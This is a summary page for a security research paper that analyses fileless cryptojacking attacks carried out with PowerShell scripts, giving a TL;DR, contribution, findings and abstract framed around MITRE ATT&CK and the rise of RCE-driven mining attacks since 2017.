The Pulse of Fileless Cryptojacking Attacks: Malicious PowerShell Scripts

TL;DR

This paper analyzes fileless cryptojacking attacks using PowerShell scripts, highlighting their stealthy nature, common malicious patterns, and the rise of such attacks exploiting RCE vulnerabilities since 2017.

Contribution

It provides a comprehensive analysis of PowerShell-based fileless cryptojacking, identifying malicious patterns and their evolution over time within the MITRE ATT&CK framework.

Findings

PowerShell scripts are the primary tool for fileless cryptojacking.

Malicious patterns follow common tactics outlined in MITRE ATT&CK.

Rise in cryptojacking attacks exploiting RCE vulnerabilities since 2017.

Abstract

Fileless malware predominantly relies on PowerShell scripts, leveraging the native capabilities of Windows systems to execute stealthy attacks that leave no traces on the victim's system. The effectiveness of the fileless method lies in its ability to remain operational on victim endpoints through memory execution, even if the attacks are detected, and the original malicious scripts are removed. Threat actors have increasingly utilized this technique, particularly since 2017, to conduct cryptojacking attacks. With the emergence of new Remote Code Execution (RCE) vulnerabilities in ubiquitous libraries, widespread cryptocurrency mining attacks have become prevalent, often employing fileless techniques. This paper provides a comprehensive analysis of PowerShell scripts of fileless cryptojacking, dissecting the common malicious patterns based on the MITRE ATT&CK framework.